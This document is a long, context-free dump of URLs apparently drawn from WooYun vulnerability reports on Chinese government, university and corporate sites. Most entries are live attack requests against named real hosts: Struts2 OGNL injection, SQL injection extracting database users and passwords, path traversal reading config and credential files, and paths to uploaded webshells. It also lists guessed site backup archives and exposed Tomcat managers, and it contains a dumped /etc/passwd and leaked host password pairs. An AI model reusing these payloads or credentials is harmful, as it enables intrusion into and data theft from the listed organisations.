http://www.gaj.hnloudi.gov.cn/gaj.rar http://ny.xiangtan.gov.cn/123.rar http://www.jsrcgz.gov.cn/jsrcgz.rar http://www.xizangtiyu.gov.cn/xizangtiyu.gov.cn.rar http://www.xczj.gov.cn/xczj.rar http://www.lsgs.gov.cn/lsgs.gov.cn.rar http://xxgk.rizhao.gov.cn/xxgk.rar http://www.zjjjs.gov.cn/1.rar www.zjjjs.gov.cn http://www.xcagri.gov.cn/data.rar http://www.ptlc.gov.cn/123.rar http://www.gaoqing.gov.cn/gaoqing.rar http://www.tlepb.gov.cn/wwwroot.rar http://www.tlepb.gov.cn/tlepb.sql http://www.dgzsj.gov.cn/dgzsj.zip http://lyj.xtx.gov.cn/lyj.xtx.gov.cn.rar http://www.czfdc.gov.cn/1.rar http://slps.wsjd.gov.cn/1.zip http://xxgk.yn.gov.cn/xxgk.rar http://www.fldm.gov.cn/fldm.rar http://ggw.jxedu.gov.cn/ggw.tar.gz http://xqjy.lnjzedu.gov.cn/xqjy.zip http://zuopin.ciwong.com/ZuoPin/GetClickTopInformation http://zuowen.ciwong.com/yuwen/GetInfoListForHomePage http://60.213.185.51:9080/wscgs/reguser.do http://www.lcwscgs.com/wscgs/reguser.do http://60.211.179.22:9080/wscgs/reguser.do http://58.59.39.43:9080/wscgs/reguser.do http://cgs.qdpolice.gov.cn:9080/wscgs/reguser.do http://218.59.228.162/wscgs/reguser.do http://cgs.ytjj.gov.cn:9061/wscgs/reguser.do http://www.wfcgs.com:9080/wscgs/reguser.do http://www.wfcgs.com:9080/wscgs/reguser.do http://221.229.255.189:8183/guest/login.aspx http://mall.lakala.com/ http://www.jncdc.com/news_keshi_list.php?pid=312&key=* http://**.**.**/android/brxx.aspxbrid=1 http://60.2.228.70:8081/szyx/zzfw/login.jsp http://freshman.sctu.edu.cn:9900/szyx/zzfw/login.jsp http://218.196.240.184:9900/szyx/zzfw/login.jsp 
http://freshman.sctu.edu.cn:9900/szyx/zzfw/article_listbyid.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jzlq.lakala.com:7070/pos/index.php?action=login http://51elearning.org.cn/ http://sso.51elearning.org.cn/sso/login.jsp http://sso.51elearning.org.cn/sso/login_10086.jsp http://sso.51elearning.org.cn/sso/portal/LoginAction.do?method=newRegister https://58.248.49.138 https://58.248.49.138/framework.do?ds=DS_RDCP_RUN_PAGE&page_code=XHP https://58.248.49.138则可以进入管理页面,拥有所有功能:可以对整个广州市联通的各个营业厅、销售订单、网点等进行管理,当然这不是我们的重点,接下来是要getshell https://58.248.49.138/uploadfile//temp/image/201501282041481.jsp https://58.248.49.138/cmd.jsp www.3721inn.com www.baotoo.com www.czslyydd.com www.maikr.com www.maitix.com www.piao.com.cn http://61.187.53.67:7000/download/download.php?file=../../config.inc.php http://blsj.cs0309.3g.qq.com/conf_simple/html/view.html?id=7 http://blsj.cs0309.3g.qq.com/conf_simple/html/ http://blsj.cs0309.3g.qq.com/conf_simple/html/view.html?id=7 http://gm.blmobile.3gqq.com/unit/gm/gm.html http://wap.yulin.gov.cn/a.zip http://www.dhjs.gov.cn/web.rar http://www.tezrsrc.gov.cn/tezrsrc.gov.cn.zip http://www.cqwshrss.gov.cn/cqwshrss.rar http://www.xcsr.gov.cn/xcsr.rar http://www.xingye.gov.cn/a.zip http://jilin.sbsm.gov.cn/jilin.zip http://school.hntax.gov.cn/hntax.zip http://jingxi.gov.cn/1.rar http://www.wlcbly.gov.cn/1.rar http://app.nanning.gov.cn/nanning.rar http://www.dyny.gov.cn/1.rar http://www.fjlyzfcg.gov.cn/web.rar http://www.dyqwj.gov.cn/dyqwj.rar http://info.xingtai.gov.cn/data.rar http://www.mlr.gov.cn/mlr.zip http://www.tzsb.gov.cn/www.rar 
http://jinrong.wangqing.gov.cn/jinrong.zip http://www.cqnagt.gov.cn/www.rar http://www.klxq.gov.cn/bbs.rar http://www.gxyldj.gov.cn/a.zip http://www.yc.gov.cn/1.rar http://www.bjlearning.gov.cn/bjlearning.sql http://www.yizheng.gov.cn/yizheng.zip http://www.wzta.gov.cn/data.rar http://zjtx.smeqd.gov.cn/zjtx.rar http://www.hndt.gov.cn/hndt.rar http://slps.wsjdzx.gov.cn/1.zip http://wgxj.maoming.gov.cn/web.rar http://guigang.gxta.gov.cn/新建文件夹.rar http://www.smeyl.gov.cn/smeyl.rar http://www.nmgsft.gov.cn/1.zip http://www.xthb.gov.cn/xthb.gov.cn.zip http://www.ylqts.gov.cn/a.zip http://www.cqybdj.gov.cn/www.rar http://www.gdgxs.gov.cn/gdgxs.gov.cn.rar http://www.luchuan.gov.cn/a.zip http://hdsww.bjhd.gov.cn/1.zip http://www.hl.jcy.gov.cn/备份.rar http://www.gzhbw.gov.cn/web.rar http://www.dongshandao.gov.cn/www.dongshandao.gov.cn.rar http://www.tcjgdj.gov.cn/www.tcjgdj.gov.cn.rar http://www.xunshan.gov.cn/xunshan.rar http://www.jn-ldjy.gov.cn/1.rar http://www.jxdjg.gov.cn/web.rar http://jianwei.ahsz.gov.cn/admin.rar http://www.bjyq.gov.cn/admin.rar http://www.zgdx.gov.cn/data.rar http://www.xtnyj.gov.cn/123.rar http://www.zbzzfdc.gov.cn/a.rar http://www.yxhrss.gov.cn/yxhrss.tar.gz http://sz315.gd315.gov.cn/web.rar http://www.zjqb.gov.cn/bak.rar http://jjw.ahq.gov.cn/wwwroot.zip http://www.sysrs.gov.cn/wwwroot.rar http://www.lysrd.gov.cn/web.rar http://www.gxbobai.gov.cn/a.zip http://www.wzmz.gov.cn/wzmz.rar http://wsxf.jx-xinfang.gov.cn/新建文件夹.rar http://www.zjkqd.gov.cn/zjkqd.rar http://www.yzcb.gov.cn/yzcb.rar http://jxw.shiyan.gov.cn/1.rar http://tougao.pacq.gov.cn/wwwroot.rar www.pacq.gov.cn http://www.beiliu.gov.cn/a.zip http://www.dysq.gov.cn/bbs.rar http://www.hebfzb.gov.cn/web.zip http://www.nxwzga.gov.cn/nxwzga.rar http://mzj.dongshandao.gov.cn/mzj.dongshandao.gov.cn.rar http://www.wulanchabu.gov.cn/1.rar http://www.jzdaj.gov.cn/1.zip http://www.zdgs.gov.cn/admin.rar http://wtj.dongshanisland.gov.cn/wtj.dongshanisland.gov.cn.rar http://gaj.jiande.gov.cn/gaj.rar 
http://www.jzzx.gov.cn/1.rar http://www.dyhtz.gov.cn/data.rar http://www.czfcj.gov.cn/admin.rar http://tieba.wangqing.gov.cn/wangqing.zip http://www.hflib.gov.cn/hflib.rar http://gymlr.gov.cn/wwwroot.rar http://www.jsmzw.gov.cn/jsmzw.gov.cn.rar http://www.lhczj.gov.cn/web.rar http://www.hbjzga.gov.cn/1.tar.gz http://www.ylyz.gov.cn/a.zip http://tour.hnsn.gov.cn/tour.rar http://sshg.xiangtan.gov.cn/123.rar http://gh.wdci.gov.cn/gh.rar http://www.haedu.gov.cn/11.rar http://jyj.ningbo.gov.cn/1.rar http://www.rxzf.gov.cn/a.zip http://www.wandafilm.com/ http://www.wandafilm.com/get_pass/get_pass.jsp http://www.wandafilm.com/common/login.jsp http://weixin.zjol.com.cn/ http://weixin.zjol.com.cn/weixin/pages/ZjolMembers/list.do http://www.fescovip.com/giftcard/login.aspx www.hxyz.com.cn:81 www.nj29jt.net:88 cn:8080 cn:8080 www.mdsz.com.cn:8080 www.dfzx.net.cn www.tyjsw.net jdbc:sqlserver://127.0.0.1:1433;databaseName=xiaoxiaoyong_school jdbc:sqlserver://127.0.0.1:1433;databaseName=master http://125.39.241.166:8080/cgi/ http://125.39.241.166:8080/cgi/cgi.zip http://125.39.241.166:8080/cgi/cgi-bin/unistat.sh?date=20150127 http://qqcgi.82696.com:8080/cgi/cgi-bin/unipay.sh?date=20150128&qq=1854000000 http://www0.ceair.com/muecard/pages/system/login/login.jsp http://app.fashion.ifeng.com/luxury/read/getData.php?letter=E http://app.fashion.ifeng.com/luxury/read/getData.php?letter=E http://app.fashion.ifeng.com/luxury/read/getData.php?letter=E http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05'&sDate2=2015-01-28'&op=1 http://zone.wooyun.org/content/16772可以轻松绕过,多看zone,及时加规则呀 http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05%27&sDate2=2015-01-28%27&op=\Nunion%20select%201,2,3,4,5,user,password,\Nfrom%20mysql.user%20--%20 http://123.151.12.139/apple/strategydetail?general_id=77 https://passport.ceair.com/cas/login?service=http%3A%2F%2Fwww.ceair.com%2Fj_spring_cas_security_check http://www.fcchbj.com/login 
http://www.jswenhui.com/login http://bticec.mypiao.com/login http://www.tianchan.com/index?type=direct http://www.qtconcerthall.com/ http://login.zhongjiu.cn/login.zhongjiu.cn.zip http://*.*.*.*:*/manager/html http://202.38.232.118:8080/manager/html inurl:/poweb/ http://p-cloud.zsodl.cn:8080/manager/html http://162.105.138.156/manager/html http://202.107.224.20:8080/manager/html http://202.197.107.11:8080/manager/html http://202.114.65.185/manager/html http://210.32.33.245:8080/manager/html http://res.sdju.edu.cn:8000/manager/html http://202.38.232.118:8080/manager/html http://222.29.253.58:8080/manager/html http://202.194.184.2:8020/manager/html http://202.197.69.15:8080/manager/html http://218.58.59.71:7272/manager/html http://210.44.126.14:8080/manager/html http://lib.zust.edu.cn:8080/manager/html http://116.13.7.80:8881/manager/html http://218.192.55.9/manager/html http://219.222.177.236:8080/manager/html http://219.246.131.9:8080/manager/html http://211.67.126.11:8088/manager/html http://211.67.182.137:8080/manager/html http://lib.sdwm.cn:9999/manager/html http://60.214.233.173:8080/manager/html http://bwss.nlic.net.cn:8080/manager/html http://202.113.140.10:8080/manager/html http://59.74.114.252:84/manager/html http://219.134.93.106:8080/login/login.jsp http://219.134.93.106:8080/login/logon.action http://mail.cmaritime.com.cn/extman/cgi/index.cgi http://demo.xdcms.cn/index.php?m=member&f=edit_save http://demo.xdcms.cn/index.php?m=member&f=register_save http://joinme.ztems.com/,我们测试的安卓版本为最新版2.1.66.3224,百度搜索显示下载量已有86万,不知中兴手机是否内置该应用。 http://www.ccfc.zju.edu.cn/ad8min/ http://www.ccfc.zju.edu.cn/uploads/y.php http://zq.17173.com/dn/joinskill/skilladd.php http://ly.db.17173.com/items.php?l1=31-40&q1=2&m1=2&lo1=4&x=47&y=14 http://rl.mcdonalds.com.cn/rl/index.php这样的话就能访问正常。 http://fsit.net/com.asp?t=0&s=0&i=1 http://60.28.2.131:8088/ http://60.28.2.131:7080/login.php url:https://vpn.airchinaf.com/prx/000/http/localhost/login 
http://wooyun.org/bugs/wooyun-2014-076218 http://tijian.jiankang.cn/ http://www.fescovip.com/benefit/buy001.aspx http://www.gzpg.com.cn/bookshop/pagelayout!input.action http://202.205.91.50:8080/xiaoyou/User_userLogin.do http://www.bjszj.gov.cn/zfbz/sousuo.asp http://m.zhongjiu.cn/ http://m.zhongjiu.cn/Address/AddressInfoPage/321921 http://www.wh.sdu.edu.cn/admin/login.jsp http://59.151.113.213/WEB-INF/web.xml http://59.151.113.213/WEB-INF/spring/webmvc-config.xml http://59.151.113.213/WEB-INF/freemarker/layouts/component.xml http://59.151.113.213/WEB-INF/freemarker/layouts/layouts.xml http://59.151.113.240/WEB-INF/web.xml http://www.kanglesoft.com/utility/convert/data/1.php http://www.kanglesoft.com/utility/convert/data/config.inc.php http://www.ymt360.com/ http://m.ymt360.com/ http://wljx.whsw.cn/public_download.jsp http://cnc.jinri.cn/Ajax/WebRequestHandler.ashx?linkURL=Airlines&ico=HU http://front.sb.huhoo.com/index/process_view/?id=72 coding:utf-8 URL:http://sxyq.hrss.gov.cn/list.php?menuid=69&departmentid=2 http://www.sxyq.hrss.gov.cn/Bbs/ssbb.php http://js.job.12580.com/news/admincp.php http://61.191.18.133/kfb/NewContent.aspx?pkid=104%E2%80%99 http://61.191.18.133/kfb/NewContent.aspx?pkid=104 android:label="Youku android:name="com.youku.service.push.StartActivityService android:exported="true http://dynamic.help.xunlei.com:8081/online?method=updatebrowsecount&productid=00124&questionid=2012090714253519163 http://www.xggxq.gov.cn/cont.asp?id=253 http://www.xgwsqwly.gov.cn/show.asp?ID=304 http://61.146.92.242/EMP/SubModule/Login/index.aspx http://cms.weather.com.cn/cms/dbtest2.jsp http://211.137.251.231/ http://admin.ebelter.com/ http://zlvod.pipi.cn/.svn/entries http://www.sonkwo.com/search?utf8=%E2%9C%93&q=img+src&button= http://em.sjtu.edu.cn/displaynote.asp?id=310 http://www.pdszygz.com/class.asp?classid=149 http://www.pdsdxscg.cn.pdswzjs.com/class.asp?classid=151 http://www.pdsfgw.gov.cn/class.asp?classid=141 
www.xxoo.com/admin/admin_login.asp,admin都爆出来了我就不继续深入了,强烈要求转交CNVD+上首页 http://www.wooyun.org/bugs/wooyun-2015-093990/trace/837f75b8f5e93d5d7afd6097b7d50323 http://www.wooyun.org/bugs/wooyun-2015-094120/trace/dced55236ac48daf075cbc5728c732f7 http://www.wooyun.org/bugs/wooyun-2015-094142/trace/687803614e3ca4c980ba7dfea9cf1546 http://www.wooyun.org/bugs/wooyun-2015-094159/trace/d6b23ca521fcdc072c118edbf51a4f08 http://www.wooyun.org/bugs/wooyun-2015-094167/trace/77c7934aa156216264162658e7803489 http://www.wooyun.org/bugs/wooyun-2015-094338/trace/cf5cd42856a4f03eab40481e01fe7efa http://www.wooyun.org/bugs/wooyun-2015-094340/trace/86501f81f553610550dabf579525bd2b http://www.wooyun.org/bugs/wooyun-2015-094429/trace/53b566c7e175f13c94d7aefe724e6e54 http://www.wooyun.org/bugs/wooyun-2015-094589/trace/139337aae0d274d3cfab5467b97dc644 http://www.zjedu.net http://220.181.154.150:8080 http://price.xcar.com.cn/serise8/city9999-1-1.htm?pop=open&is_cms=15&mid=11275 http://www.shenguang.com/RZRQ2/time.aspx?t=SH&order=desc&Column=StockName&time=2015-01-27 http://mf.travelsky.com/xmb2b/managerlogin.do http://et.xiamenair.com.cn/xmb2b/b2blogin.do http://xyh.njue.edu.cn/admin/ http://store.hotel.tdxinfo.com/tops-front-purchaser-hotel/pur/order/hotel/orderView http://jda.cq.gov.cn/cqdaglyb/FrontUI/AddComment.aspx?strurl=yy http://119.188.6.230:8989/ http://116.228.55.205/www.rar http://qchat.tdtchina.cn/nmrm/login.action http://**.**.**/ http://psy.ruc.edu.cn/faculty.php?sortid=3 http://119.188.254.18:8080/ http://**.**.**/indexx.aspx http://61.164.120.131/Login.aspx www.wzcc.com http://oa.wzcc.com/WebService/SMS.asmx"/ http://pxglbbs.wzcc.com/"/ http://acc.jxf.gov.cn/QuerryAll/GetContinue.aspx http://sqlmap.org http://tuan.ly.com/tuan/Handler/TuanDetailAjaxHandler.ashx?method=GetUserGrade&groupbuyid=654708&iid=0.7009963680917772 http://www.nongyou.com.cn/ http://221.2.171.59:8000/rushanview.aspx?id=288&newsid=1299&deptid=55 
http://222.135.127.190:7000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://221.2.149.47:8100/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.109.70:8100/rushanview.aspx?id=288&newsid=1299&deptid=55 http://221.2.171.59:8000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.127.190:7000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://61.133.119.187:8089/rushanview.aspx?id=288&newsid=1299&deptid=55 http://61.133.119.187:8089/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.127.190:7000/rushanview.aspx?id=288&newsid=1299&deptid=55 www.55.la http://124.238.218.78/ inurl:gqlist.aspx?deptid= http://221.2.171.59:8000/gqlist.aspx?deptid=50&id=289 http://222.135.109.70:8100/gqlist.aspx?deptid=51&id=286 http://61.133.119.187:8089/gqlist.aspx?deptid=51&id=284 http://222.135.127.190:7000/gqlist.aspx?deptid=55&id=286 http://221.2.149.47:8100/gqlist.aspx?deptid=58&id=285 http://60.217.72.17:8000/gqlist.aspx?deptid=51&id=245 http://wutongyu.info/uxss.html触发,看上图,已经成功跨域了。 url:http://60.173.176.29:7001/defaultroot/login.jsp?localeCode=zh_CN https://passport.souyidai.com/password/findpassword http://www.pengpengmall.com/ http://192.168.1.1/tmp/dhcpd.leases http://tcl.com/Public http://oa.king.tcl.com/login.aspx http://ggzy.neijiang.gov.cn/ http://ggzy.neijiang.gov.cn/gbook/ http://www.zhcall.com/zhcall.rar http://xiaoyuan.lefeng.com/WEB-INF/web.xml http://xiaoyuan.lefeng.com/WEB-INF/classes/applicationContext.xml http://xiaoyuan.lefeng.com/WEB-INF/classes/application.properties http://spark.tencent.com/ http://www.nongyou.com.cn/ http://222.135.109.70:8100/wendengview.aspx?deptid=54&atid=291 http://61.133.119.187:8089/wendengview.aspx?deptid=54&atid=291 http://222.135.127.190:7000/wendengview.aspx?deptid=54&atid=291 http://221.2.171.59:8000/wendengview.aspx?deptid=54&atid=291 http://221.2.156.181:8100/wendengview.aspx?deptid=54&atid=291 http://221.2.149.47:8100/wendengview.aspx?deptid=54&atid=291 
http://222.135.127.190:7000/wendengview.aspx?deptid=54&atid=291 http://222.135.127.190:7000/wendengview.aspx?deptid=54&atid=291 http://221.2.149.47:8100/wendengview.aspx?deptid=54&atid=291 http://onair.cdvcloud.com/ http://onair.cdvcloud.com/download/data/?path=../WEB-INF/web.xml http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/applicationContext.xml classpath:email.properties classpath:jdbc.properties http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/jdbc.properties http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/email.properties http://www.lwsyy.com/yuyuec/LY_Edit.asp?id=11699 http://www.lwsyy.com/yuyuec/LY_Edit.asp?id=11699 http://www.lwsyy.com/yuyuec/admin/Admin_Login.asp http://www.lwsyy.com/yuyuec/sea.asp http://weiyun.tmt.tcl.com/ http://weiyun.tmt.tcl.com/basic/usermanager/sysOrgUser/login post:fdName=test&fdPws=test http://www.nongyou.com.cn/ http://221.2.149.47:8100/neiye.aspx?id=246 http://222.135.109.70:8100/neiye.aspx?id=246 http://61.133.119.187:8089/neiye.aspx?id=246 http://222.135.127.190:7000/neiye.aspx?id=246 http://221.2.171.59:8000/neiye.aspx?id=246 http://222.135.109.70:8100/neiye.aspx?id=246 http://221.2.156.181:8100/neiye.aspx?id=246 http://221.2.156.181:8100/neiye.aspx?id=246 http://222.135.109.70:8100/neiye.aspx?id=246 http://221.2.171.59:8000/neiye.aspx?id=246 http://www.phei.com.cn/module/zygl/manager/uploadpic.jsp?option=upload http://www.phei.com.cn/module/zygl/manager/uploadfiles/Browser.jsp http://www.zlqh.com/ http://www.zlqh.com/zlqhbackground/login.php http://crm.byd.com.cn/login.jsp http://crm.byd.com.cn/login!checkUserFront.action http://sms.517na.com/SMSLogin.aspx http://www.517na.com注册一个,这里不麻烦了,直接用这个洞爆破的一个账号 sms.517na.com/Pay/SMFillMoney.aspx www.zyzj.gov.cn http://vmi.tclking.com/ http://59.33.249.46/Default.aspx http://www.jilinnongye.com/吉林农业 http://www.jtnsh.com/吉林九台农村商业银行 http://www.jilinnongye.com/ewebeditor/hack.php http://www.jtnsh.com/1.php http://www.nongyou.com.cn/ 
http://222.135.127.190:7000/Swgk/Default.aspx?st=1&deptid=52 http://221.2.171.59:8000/Swgk/Default.aspx?st=1&deptid=52 http://222.135.109.70:8100/Swgk/Default.aspx?st=1&deptid=52 http://61.133.119.187:8089/Swgk/Default.aspx?st=1&deptid=52 http://221.2.156.181:8100//Swgk/Default.aspx?st=1&deptid=52 http://221.2.149.47:8100/Swgk/Default.aspx?st=1&deptid=52 http://222.135.127.190:7000/Swgk/Default.aspx?st=1&deptid=52 http://222.135.127.190:7000/Swgk/Default.aspx?st=1&deptid=52 http://221.2.149.47:8100/Swgk/Default.aspx?st=1&deptid=52 http://fczx.lfmz.gov.cn/index.html https://elearning.bankcomm.com/?r=site/login http://www.glxy.chinamobile.com http://www.zjwhgx.cn/News.aspx?Key=xxx http://www.zjwhgx.cn/ckfinder/ckfinder.html http://mobile.cnooc.com.cn inurl:wendenglist.aspx?deptid= http://221.2.171.59:8000/wendenglist.aspx?deptid=50&id=220 http://61.133.119.187:8089/wendenglist.aspx?deptid=51&id=221 http://222.135.109.70:8100/wendenglist.aspx?deptid=57&id=222 http://222.135.127.190:7000/wendenglist.aspx?deptid=55&id=223 http://221.2.149.47:8100/wendenglist.aspx?deptid=59&id=220 http://60.217.72.17:8000/wendenglist.aspx?deptid=58&id=221 http://www.zg.gov.cn/NewsList.aspx?RegionId=B0&CataId=62002&CataId2=04 http://highlights.paper.edu.cn/search_section.php?year=2013&qi=6 http://jpkc.hfut.edu.cn/jpkc2004/2004/theme_list2.php?sub_id=11 http://lgb.hfut.edu.cn/show_news.php?news_id=143 http://zichan.hfut.edu.cn/second.php?c_id=7 http://ca.hfut.edu.cn/soc_news_detail.php?id=291 http://geopw.whu.edu.cn:8080/axis2/axis2-admin/ http://geopw.whu.edu.cn:8080/axis2/services/Cat/exec?cmd=whoami http://passport.joycp.com/ http://passport.joycp.com/ajax/login.ashx?username=xxx&pwd=xxx&vcode=&jsonp=JoyCp.Login.Result&rnd=0.3753943075351882 http://xzsp.moa.gov.cn/ http://www.px.sdu.edu.cn/manage/login.jsp http://60.214.69.81 http://60.217.236.240/User# http://rrt.cer.com.cn/ http://rrt.cer.com.cn/schoolspace.php?orgcode=0000000000 
https://ticket.wuhan.wandamoviepark.com/Choose/ChooseTicket http://kf.bestpay.com.cn http://kf.bestpay.com.cn/zhij/imsystem/im/im_client.jsp?queueId=1011&guestId=&sessionId=&keyword= http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp http://kf.bestpay.com.cn/zhij/imsystem/sendfile/client/20150129113305618_1.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon 
user:/home/sabayon:/sbin/nologin webapp:x:501:501::/home/webapp:/bin/bash kefu_remote:x:502:10::/home/kefu_remote:/bin/bash fengkong:x:503:505::/webapp/tykf2/upload/fengkong:/sbin/nologin http://172.16.248.128:8080 http://www.hebijj.gov.cn/cgs/main/index http://px.xmrc.com.cn/lecturerAction!indexFind.action http://contest.ceair.com:8020/ http://iwatchome.tom.com/Wiki_style.php?w2_id=261 http://www.strongsoft.net/ http://219.159.239.96:8088/为例,在后台测试中发现如下操作无需登录即可进行: http://lolnewbf.178.com/person/index?server=卡拉曼达&name=262120442222 http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/ProblemsWarning.aspx?pid=1 http://221.2.171.59:8000/jubao/ProblemsWarning.aspx?pid=1 http://222.135.76.147:8100/jubao/ProblemsWarning.aspx?pid=1 http://222.135.109.70:8100/jubao/SProblemsWarning.aspx?pid=1 http://61.133.119.187:8089/jubao/ProblemsWarning.aspx?pid=1 http://60.217.72.17:8000/jubao/ProblemsWarning.aspx?pid=1 http://111.17.169.210:801/jubao/ProblemsWarning.aspx?pid=1 http://221.2.171.59:8000/jubao/ProblemsWarning.aspx?pid=1 http://222.135.76.147:8100/jubao/ProblemsWarning.aspx?pid=1 http://ggfw.lfmz.gov.cn/index.html http://news.damai.cn/FrontNewsAdmin/NewsContentAction.do?labelName=注入参数&newsId=272&number=4&_action=getRelatedNews http://news.damai.cn/FrontNewsAdmin/NewsContentAction.do?labelName= https://mail.travelsky.com/ https://122.119.255.79/por/login_psw.csp www.financecenter https://**.**.** http://**.**.**/login.jsp http://**.**.**/denglu.aspurl1=15_ http://**.**.**/caci/admin/login.jsp_ http://**.**.**/LogIn.aspx_ https://**.**.**/TecAlert/_ http://202.100.228.122:8080/rdom/login.jsp_ http://**.**.**/lbsp_service/services/AxisWebServiceEntryService/callAxisServiceparamList= http://**.**.**/svn/document2014/ProjDoc/laputa/20工程/20.50测试/需替换的配置文件_ http://**.**.** http://**.**.** http://**.**.** http://**.**.**/caci/admin/login.jsp VM-VMW1292-OA:ap3che VM-VMW1292-OA:oadevelop VM-VMW1292-OA:123456 TRAVELSKY-OP:Zhouyi17 VM-VMW190-APP:Dell519Server 
http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp.bak http://city2012.house.sina.com.cn/?ctrl=personal&uid=1276151065%20UNION%20ALL%20SELECT%200,1,2,3,4,5,6,7,8,CONCAT%280x5e5e5e,user%28%29,0x5e5e5e%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# http://m.aili.com/index.php?c=wap&m=archive&a=index&channel=auto&column=qichexinshi&aid=819248 http://xinpan.zzhz.zjol.com.cn/zjol/newhouse/admin/Admin_login.html http://www.gdzjepb.gov.cn/business/apply.php?action=edit&id=15 URL:/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://egov.pzhzw.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://egov.scsn.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://egov.zgzw.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://stgov.my.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile URL:/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read http://egov.pzhzw.gov.cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read http://egov.pzhzw.gov.cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read http://dy.show.sina.com.cn/getnew.php http://tel6.53kf.com/external.php?controller=web&style=70816065-4000290058-103764652 http://cts.tcl.com/images/help.aspx http://cts.tcl.com/images/2.asp http://bme.sjtu.edu.cn/indexnew.aspx?TID=1 http://bme.sjtu.edu.cn/indexnew_show.aspx?NID=367&TID=1 http://bme.sjtu.edu.cn/indexpage_pic.aspx?TID=1 http://bme.sjtu.edu.cn/new.aspx?TID=4&TID2=37 http://bme.sjtu.edu.cn/pagetypeurl.aspx?TID=1 
http://bme.sjtu.edu.cn/page_pic.aspx?TID=2&TID2=25&TID3=68 http://bme.sjtu.edu.cn/new_show.aspx?NID=51&TID=1&TID2=37&TID3=0 http://180.166.69.84:8886/zhij/imsystem/im/im_client.jsp?queueId=1011&guestId=&sessionId=&keyword= http://180.166.69.84:8886/zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp http://180.166.69.84:8886/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp http://180.166.69.84:8886/zhij/imsystem/sendfile/client/20150129113305618_1.jsp http://mjzz.lfmz.gov.cn/ http://www.hzlib.net/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../../../ http://www.sxmu.edu.cn/zyc/UploadFiles/2015127181136748.cer http://www.bynrzfcg.cn/articleWeb!view.action http://www.webcet.cn/ 